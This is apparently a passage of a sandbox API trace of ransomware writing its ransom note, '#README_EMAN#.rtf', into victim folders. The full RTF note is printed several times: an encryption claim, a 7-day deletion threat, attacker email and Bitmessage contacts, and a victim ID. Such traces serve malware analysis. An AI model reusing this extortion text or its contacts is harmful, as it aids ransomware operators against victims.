!!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef5068, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nzráb\x95.ê©ÀAH\x01¹HÂP[w.\x80¬Ñ%cD", lpUsedDefaultChar=0x0) returned 8717 [0278.578] WriteFile (in: hFile=0x2c8, lpBuffer=0x1ef5068*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef5068*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0278.578] CloseHandle (hObject=0x2c8) returned 1 [0278.579] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\#readme_eman#.rtf")) returned 0xffffffff [0278.579] GetLastError () returned 0x2 [0278.579] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\ghbmnnjooekpmoecnnnilnnbdlolhkhi\\1.4_0\\_locales\\hi\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2c8 [0278.579] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0278.579] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE 